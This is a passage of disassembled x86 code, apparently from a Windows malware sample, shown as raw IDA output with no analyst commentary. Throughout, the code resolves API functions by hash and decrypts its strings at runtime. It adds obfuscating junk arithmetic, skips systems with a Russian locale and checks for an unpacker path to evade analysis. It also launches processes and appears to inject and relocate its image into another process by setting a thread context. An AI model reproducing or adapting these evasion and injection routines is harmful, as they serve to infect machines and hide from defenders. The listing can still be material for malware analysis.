; sub_4017F6+445�j
cmp dword_404104, 54h
pop edi
pop esi
jge short loc_401C57
inc dword_404104
loc_401C57: ; CODE XREF: sub_4017F6+459�j
lea ecx, [eax-2]
cmp ecx, 3FEh
ja short loc_401C66
xor eax, eax
jmp short loc_401CC0
; ---------------------------------------------------------------------------
loc_401C66: ; CODE XREF: sub_4017F6+46A�j
cmp [ebp+arg_8], bl
jz short loc_401CBD
add eax, 0FFFFFBFFh
cmp eax, 48FDEh
ja short loc_401CBD
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_4010BB
push 46318AC7h
push 1
call sub_401117
add esp, 14h
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
cmp [ebp+var_8], 1
jnz short loc_401CB8
xor eax, eax
inc eax
jmp short loc_401CC0
; ---------------------------------------------------------------------------
loc_401CB8: ; CODE XREF: sub_4017F6+4BB�j
push 2
pop eax
jmp short loc_401CC0
; ---------------------------------------------------------------------------
loc_401CBD: ; CODE XREF: sub_4017F6+473�j
; sub_4017F6+47F�j
or eax, 0FFFFFFFFh
loc_401CC0: ; CODE XREF: sub_4017F6+46E�j
; sub_4017F6+4C0�j ...
pop ebx
leave
retn
sub_4017F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_401CC3 proc near ; CODE XREF: sub_4029F5:loc_402D64�p
; DATA XREF: sub_402857+13C�o
var_2B4 = byte ptr -2B4h
var_1B4 = byte ptr -1B4h
var_B4 = byte ptr -0B4h
var_A4 = byte ptr -0A4h
var_94 = byte ptr -94h
var_84 = byte ptr -84h
var_74 = byte ptr -74h
var_64 = byte ptr -64h
var_54 = byte ptr -54h
var_44 = byte ptr -44h
var_34 = byte ptr -34h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 2B4h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_404208
push esi
push offset dword_403034
call sub_40102E
mov edi, 0C8AC8026h
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset dword_403204
call sub_40102E
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset dword_4031F4
call sub_40102E
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 1Ch
pop eax
push 0FFFFFFDEh
mov byte ptr [ebp+78h+var_8], 1
pop ecx
loc_401D36: ; CODE XREF: sub_401CC3+86�j
cmp ecx, 0B7h
ja short loc_401D40
inc eax
inc ecx
loc_401D40: ; CODE XREF: sub_401CC3+79�j
add eax, 1Dh
add ecx, 1Dh
cmp eax, 66h
jl short loc_401D36
push 7A813811h
xor ebx, ebx
push 1
mov dword_404104, eax
mov [ebp+78h+var_24], ebx
call sub_401117
pop ecx
pop ecx
call eax
movzx eax, ax
mov [ebp+78h+var_4], eax
mov eax, dword_404104
add eax, 0FFFFFFDBh
cmp eax, 0B3h
ja short loc_401D80
inc dword_404104
loc_401D80: ; CODE XREF: sub_401CC3+B5�j
push 3
push esi
push offset dword_4031F0
call sub_40102E
push 67ECDE97h
push 1
call sub_401117
add esp, 14h
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+78h+var_24]
push ecx
push ebx
push ebx
push esi
call eax
push 2
push esi
push offset dword_4031EC
call sub_40102E
push [ebp+78h+var_24]
lea eax, [ebp+78h+var_44]
push esi
push eax
call dword_403014 ; wsprintfA
mov eax, dword_404104
add eax, 0FFFFFFC0h
add esp, 18h
cmp eax, 8Fh
ja short loc_401DDC
inc dword_404104
loc_401DDC: ; CODE XREF: sub_401CC3+111�j
push 9
push esi
push offset loc_4031E0
call sub_40102E
mov edi, dword_403000
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_B4]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_4031D4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_A4]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_4031C4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_94]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_4031B4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_84]
push eax
call edi ; lstrcpy
push 9
push esi
push offset byte_4031A8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_74]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_403198
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_64]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_403188
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_54]
push eax
call edi ; lstrcpy
push 25h
push esi
push offset aFfXrrtSsUFPRSR ; "xRRPRRR"
call sub_40102E
add esp, 0Ch
push esi
push offset dword_404108
call edi ; lstrcpy
push 26h
push esi
push offset dword_403138
call sub_40102E
add esp, 0Ch
push esi
push offset dword_404308
call edi ; lstrcpy
cmp word ptr [ebp+78h+var_4], 419h
jz loc_402427
call sub_401094
test eax, eax
jnz loc_402427
call sub_40131A
test al, al
jz short loc_401EDC
push ebx
call sub_4014C3
pop ecx
loc_401EDC: ; CODE XREF: sub_401CC3+210�j
push 3
push esi
push offset nullsub_2
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
mov ebx, dword_40300C
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 14h
push esi
push offset aTpRRvRbjf ; "Prvbjf"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 0
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add esp, 10h
push 2
push esi
push offset nullsub_1
call sub_40102E
add esp, 0Ch
lea eax, [ebp+78h+var_1B4]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+78h+var_4], 410h
jnz short loc_401F8D
lea eax, [ebp+78h+var_A4]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 6
push esi
push offset dword_403110
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
jmp loc_402156
; ---------------------------------------------------------------------------
loc_401F8D: ; CODE XREF: sub_401CC3+29A�j
lea eax, [ebp+78h+var_B4]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Eh
push esi
push offset dword_403100
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 1
push 1
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_401FDA
mov byte ptr [ebp+78h+var_8], 0
loc_401FDA: ; CODE XREF: sub_401CC3+311�j
push 2
push esi
push offset nullsub_1
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_74]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Eh
push esi
push offset dword_4030F0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402042
mov byte ptr [ebp+78h+var_8], 0
loc_402042: ; CODE XREF: sub_401CC3+379�j
push 2
push esi
push offset nullsub_1
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_64]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Ch
push esi
push offset dword_4030E0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_4020AA
mov byte ptr [ebp+78h+var_8], 0
loc_4020AA: ; CODE XREF: sub_401CC3+3E1�j
push 2
push esi
push offset nullsub_1
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_94]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Ch
push esi
push offset aSP ; "P"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_402112
mov byte ptr [ebp+78h+var_8], 0
loc_402112: ; CODE XREF: sub_401CC3+449�j
push 2
push esi
push offset nullsub_1
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_84]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 0Ch
push esi
push offset aTP ; "P"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
loc_402156: ; CODE XREF: sub_401CC3+2C5�j
push 1
lea eax, [ebp+78h+var_1B4]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_40217A
mov byte ptr [ebp+78h+var_8], 0
loc_40217A: ; CODE XREF: sub_401CC3+4B1�j
push 2
push esi
push offset nullsub_1
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_54]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
push 8
push esi
push offset aUCr ; ""
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 1
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add [ebp+78h+var_4], eax
add esp, 10h
cmp eax, 2
jnz short loc_4021E2
mov byte ptr [ebp+78h+var_8], 0
loc_4021E2: ; CODE XREF: sub_401CC3+519�j
cmp [ebp+78h+var_4], 0
jle loc_402425
push 3
push esi
push offset nullsub_2
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_1B4]
push eax
call edi ; lstrcpy
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_1B4]
push eax
call ebx ; lstrcat
mov eax, dword_404104
add eax, 0FFFFFFDFh
cmp eax, 0C7h
ja short loc_402228
inc dword_404104
loc_402228: ; CODE XREF: sub_401CC3+55D�j
push 1Dh
push esi
push offset aPRRvRbjf@Nv ; "Prvbjf@nv"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call edi ; lstrcpy
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+78h+var_34]
push ecx
call eax
push 3
pop eax
push 0FFFFFFB4h
pop ecx
loc_40225C: ; CODE XREF: sub_401CC3+5AB�j
cmp ecx, 7Bh
ja short loc_402263
inc eax
inc ecx
loc_402263: ; CODE XREF: sub_401CC3+59C�j
add eax, 18h
add ecx, 18h
cmp eax, 0B1h
jl short loc_40225C
mov dword_404104, eax
movzx eax, [ebp+78h+var_2C]
push eax
mov edi, offset dword_403090
lea eax, [ebp+78h+var_10]
push edi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+78h+var_10]
add al, 1Dh
add esp, 0Ch
cmp byte ptr [ebp+78h+var_10+1], 0
mov [ebp+78h+var_17], al
jnz short loc_4022A1
mov [ebp+78h+var_15], 30h
jmp short loc_4022A9
; ---------------------------------------------------------------------------
loc_4022A1: ; CODE XREF: sub_401CC3+5D6�j
mov al, byte ptr [ebp+78h+var_10+1]
add al, 13h
mov [ebp+78h+var_15], al
loc_4022A9: ; CODE XREF: sub_401CC3+5DC�j
mov eax, dword_404104
add eax, 0FFFFFFBBh
cmp eax, 8Ah
ja short loc_4022BE
inc dword_404104
loc_4022BE: ; CODE XREF: sub_401CC3+5F3�j
movzx eax, [ebp+78h+var_2A]
push eax
lea eax, [ebp+78h+var_C]
push edi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+78h+var_C]
add al, 17h
add esp, 0Ch
cmp byte ptr [ebp+78h+var_C+1], 0
mov [ebp+78h+var_18], al
jnz short loc_4022E5
mov [ebp+78h+var_16], 30h
jmp short loc_4022ED
; ---------------------------------------------------------------------------
loc_4022E5: ; CODE XREF: sub_401CC3+61A�j
mov al, byte ptr [ebp+78h+var_C+1]
add al, 19h
mov [ebp+78h+var_16], al
loc_4022ED: ; CODE XREF: sub_401CC3+620�j
lea eax, [ebp+78h+var_18]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
mov [ebp+78h+var_14], 0
call ebx ; lstrcat
push 7
push esi
push offset loc_403088
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+78h+var_34]
push ecx
call eax
mov eax, dword_404104
add eax, 0FFFFFFC2h
cmp eax, 0B9h
ja short loc_402341
inc dword_404104
loc_402341: ; CODE XREF: sub_401CC3+676�j
movzx eax, [ebp+78h+var_2C]
push eax
lea eax, [ebp+78h+var_10]
push edi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+78h+var_10]
add esp, 0Ch
test ah, ah
mov [ebp+78h+var_1F], al
mov [ebp+78h+var_1E], 30h
jz short loc_402366
mov [ebp+78h+var_1E], ah
loc_402366: ; CODE XREF: sub_401CC3+69E�j
push 55h
pop eax
push 13h
pop ecx
loc_40236C: ; CODE XREF: sub_401CC3+6BE�j
cmp ecx, 0AEh
ja short loc_402376
inc eax
inc ecx
loc_402376: ; CODE XREF: sub_401CC3+6AF�j
add eax, 28h
add ecx, 28h
cmp eax, 8Fh
jl short loc_40236C
mov dword_404104, eax
movzx eax, [ebp+78h+var_2A]
push eax
lea eax, [ebp+78h+var_C]
push edi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+78h+var_C]
add esp, 0Ch
test ah, ah
mov [ebp+78h+var_1D], al
mov [ebp+78h+var_20], 30h
jz short loc_4023AD
mov [ebp+78h+var_20], ah
loc_4023AD: ; CODE XREF: sub_401CC3+6E5�j
lea eax, [ebp+78h+var_20]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
mov [ebp+78h+var_1C], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_403080
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
lea eax, [ebp+78h+var_44]
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call ebx ; lstrcat
push [ebp+78h+var_8]
lea eax, [ebp+78h+var_1B4]
push 0
push eax
lea eax, [ebp+78h+var_2B4]
push eax
call sub_4017F6
add esp, 10h
cmp dword_404104, 3
jl short loc_40240F
inc dword_404104
loc_40240F: ; CODE XREF: sub_401CC3+744�j
cmp dword_404104, 0BDh
jle short loc_402425
mov dword_404104, 16h
loc_402425: ; CODE XREF: sub_401CC3+523�j
; sub_401CC3+756�j
xor ebx, ebx
loc_402427: ; CODE XREF: sub_401CC3+1F6�j
; sub_401CC3+203�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
sub_401CC3 endp
; =============== S U B R O U T I N E =======================================
sub_402440 proc near ; DATA XREF: sub_402857+5D�o
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401117
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_402488
; ---------------------------------------------------------------------------
loc_402456: ; CODE XREF: sub_402440+4F�j
push 1297812Ch
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_402491
push 3D9972F5h
push 1
call sub_401117
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401117
loc_402488: ; CODE XREF: sub_402440+14�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_402456
loc_402491: ; CODE XREF: sub_402440+29�j
pop edi
xor eax, eax
pop esi
retn 4
sub_402440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402498 proc near ; CODE XREF: sub_402857+141�p
; sub_4029F5+14D�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push ebx
push esi
push edi
call sub_401113
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword_404104, 0Ch
mov [ebp+var_18], eax
lea eax, [ecx+18h]
mov esi, [eax+38h]
mov [ebp+var_24], ecx
mov [ebp+var_14], eax
mov [ebp+var_1C], esi
jl short loc_4024D4
inc dword_404104
loc_4024D4: ; CODE XREF: sub_402498+34�j
cmp dword_404104, 0E1h
jle short loc_4024EA
mov dword_404104, 27h
loc_4024EA: ; CODE XREF: sub_402498+46�j
push 0A08B638Ch
xor ebx, ebx
push 1
mov [ebp+var_1], bl
call sub_401117
pop ecx
pop ecx
push 9
call eax
mov edi, eax
neg edi
sbb edi, edi
and edi, 3Ch
add edi, 4
cmp dword_404104, 0A7h
jge short loc_40251F
inc dword_404104
loc_40251F: ; CODE XREF: sub_402498+7F�j
push 0EF0A25B7h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push esi
push ebx
push edi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_402544
xor al, al
jmp loc_402852
; ---------------------------------------------------------------------------
loc_402544: ; CODE XREF: sub_402498+A3�j
push 5CD9430h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_C]
call eax
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_402817
mov eax, dword_404104
add eax, 0FFFFFFD0h
cmp eax, 0C0h
ja short loc_40257C
inc dword_404104
loc_40257C: ; CODE XREF: sub_402498+DC�j
push 12h
mov esi, offset dword_404208
push esi
push offset aRfcATtKF ; ""
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_403000 ; lstrcpy
push 9
push esi
push offset aFP ; "P"
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push 1
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
cmp dword_404104, 4
mov [ebp+var_10], ebx
jl short loc_4025E4
inc dword_404104
loc_4025E4: ; CODE XREF: sub_402498+144�j
cmp dword_404104, 0F1h
jle short loc_4025FA
mov dword_404104, 27h
loc_4025FA: ; CODE XREF: sub_402498+156�j
mov esi, [ebp+var_1C]
push edi
push ebx
push 1
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_10]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], esi
push [ebp+var_C]
call eax
mov edi, [ebp+var_18]
push esi
push edi
push [ebp+var_8]
call sub_4010EE
add esp, 0Ch
cmp dword_404104, 7
jl short loc_402636
inc dword_404104
loc_402636: ; CODE XREF: sub_402498+196�j
cmp dword_404104, 0A2h
jle short loc_40264C
mov dword_404104, 27h
loc_40264C: ; CODE XREF: sub_402498+1A8�j
mov eax, [ebp+var_24]
movzx ecx, word ptr [eax+14h]
add ecx, [ebp+var_14]
push 50h
pop edx
push 2Dh
pop eax
loc_40265C: ; CODE XREF: sub_402498+1D9�j
cmp eax, 0BCh
ja short loc_402665
inc edx
inc eax
loc_402665: ; CODE XREF: sub_402498+1C9�j
add edx, 11h
add eax, 11h
cmp edx, 0B6h
jl short loc_40265C
mov esi, [ebp+var_10]
mov eax, esi
sub eax, edi
cmp edx, 0C9h
mov dword_404104, edx
mov [ebp+var_14], eax
jge short loc_402692
inc edx
mov dword_404104, edx
loc_402692: ; CODE XREF: sub_402498+1F1�j
mov eax, [ecx+34h]
add eax, edi
loc_402697: ; CODE XREF: sub_402498+210�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_4026A7
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_4026AA
loc_4026A7: ; CODE XREF: sub_402498+204�j
inc eax
jmp short loc_402697
; ---------------------------------------------------------------------------
loc_4026AA: ; CODE XREF: sub_402498+20D�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, edi
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026B4: ; CODE XREF: sub_402498+22B�j
add eax, 8
jmp short loc_4026BA
; ---------------------------------------------------------------------------
loc_4026B9: ; CODE XREF: sub_402498+225�j
inc eax
loc_4026BA: ; CODE XREF: sub_402498+21F�j
cmp [eax], bx
jnz short loc_4026B9
inc eax
inc eax
loc_4026C1: ; CODE XREF: sub_402498+21A�j
cmp [eax], ebx
jnz short loc_4026B4
cmp edx, 0A9h
jge short loc_4026D4
inc edx
mov dword_404104, edx
loc_4026D4: ; CODE XREF: sub_402498+233�j
mov ecx, [ecx+0Ch]
mov edi, [ebp+var_8]
add eax, 4
lea edi, [ecx+edi-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_402718
loc_4026E8: ; CODE XREF: sub_402498+275�j
cmp cl, 0F0h
jnb short loc_4026F4
movzx ecx, cl
add edi, ecx
jmp short loc_402703
; ---------------------------------------------------------------------------
loc_4026F4: ; CODE XREF: sub_402498+253�j
movzx edx, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, edx
add edi, ecx
inc eax
inc eax
loc_402703: ; CODE XREF: sub_402498+25A�j
mov ecx, [ebp+var_14]
add [edi], ecx
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4026E8
mov esi, [ebp+var_10]
mov edx, dword_404104
loc_402718: ; CODE XREF: sub_402498+24E�j
cmp edx, 5
jl short loc_402724
inc edx
mov dword_404104, edx
loc_402724: ; CODE XREF: sub_402498+283�j
cmp edx, 0EAh
jle short loc_402736
mov dword_404104, 23h
loc_402736: ; CODE XREF: sub_402498+292�j
sub esi, [ebp+var_18]
add esi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
mov edi, esi
jnz short loc_40279A
push 0E61874B3h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
cmp dword_404104, 3
mov [ebp+var_1], 1
jl short loc_402782
inc dword_404104
loc_402782: ; CODE XREF: sub_402498+2E2�j
cmp dword_404104, 0C4h
jle short loc_402804
mov dword_404104, 14h
jmp short loc_402804
; ---------------------------------------------------------------------------
loc_40279A: ; CODE XREF: sub_402498+2A9�j
push 0AA1DE02Fh
push 1
mov [ebp+var_310], 10002h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_260], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 38h
pop eax
push 15h
mov [ebp+var_1], 1
pop ecx
loc_4027E8: ; CODE XREF: sub_402498+365�j
cmp ecx, 0D1h
ja short loc_4027F2
inc eax
inc ecx
loc_4027F2: ; CODE XREF: sub_402498+356�j
add eax, 0Eh
add ecx, 0Eh
cmp eax, 0BCh
jl short loc_4027E8
mov dword_404104, eax
loc_402804: ; CODE XREF: sub_402498+2F4�j
; sub_402498+300�j
push 77CD9567h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_402817: ; CODE XREF: sub_402498+C9�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
cmp dword_404104, 13h
jl short loc_402839
inc dword_404104
loc_402839: ; CODE XREF: sub_402498+399�j
cmp dword_404104, 0ADh
jle short loc_40284F
mov dword_404104, 19h
loc_40284F: ; CODE XREF: sub_402498+3AB�j
mov al, [ebp+var_1]
loc_402852: ; CODE XREF: sub_402498+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_402498 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402857 proc near ; DATA XREF: sub_4029F5+148�o
; sub_4029F5+32F�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_401117
pop ecx
pop ecx
push 7D0h
call eax
push 4Dh
pop eax
push 3
pop ecx
loc_40287F: ; CODE XREF: sub_402857+3D�j
cmp ecx, 0AAh
ja short loc_402889
inc eax
inc ecx
loc_402889: ; CODE XREF: sub_402857+2E�j
add eax, 17h
add ecx, 17h
cmp eax, 90h
jl short loc_40287F
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov dword_404104, eax
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_402440
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_401117
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov esi, offset dword_404208
push esi
push offset dword_403244
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40300C ; lstrcat
mov esi, dword_404104
cmp esi, 0Fh
jl short loc_40291F
inc esi
mov dword_404104, esi
loc_40291F: ; CODE XREF: sub_402857+BF�j
cmp esi, 0EBh
jle short loc_402930
push 21h
pop esi
mov dword_404104, esi
loc_402930: ; CODE XREF: sub_402857+CE�j
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov [ebp+var_48], 44h
call sub_4010BB
lea eax, [esi-49h]
add esp, 0Ch
cmp eax, 85h
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
ja short loc_402960
inc esi
mov dword_404104, esi
loc_402960: ; CODE XREF: sub_402857+100�j
push 46318AC7h
push ebx
call sub_401117
pop ecx
pop ecx
push offset dword_40440C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_404410
push dword_40440C
push offset sub_401CC3
call sub_402498
add esp, 0Ch
test al, al
jz short loc_4029BA
mov esi, dword_404410
push 7B88BF3Bh
push ebx
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_4029BA: ; CODE XREF: sub_402857+14B�j
push 46h
pop eax
push 8
pop ecx
pop esi
loc_4029C1: ; CODE XREF: sub_402857+17F�j
cmp ecx, 0A8h
ja short loc_4029CB
inc eax
inc ecx
loc_4029CB: ; CODE XREF: sub_402857+170�j
add eax, 23h
add ecx, 23h
cmp eax, 0B2h
jl short loc_4029C1
push 768AA260h
push ebx
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push edi
call eax
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_402857 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029F5 proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_13C]
push edi
mov [ebp+var_4], eax
call sub_40131A
xor ebx, ebx
test al, al
jz loc_402D64
cmp dword_404104, ebx
jl short loc_402A27
inc dword_404104
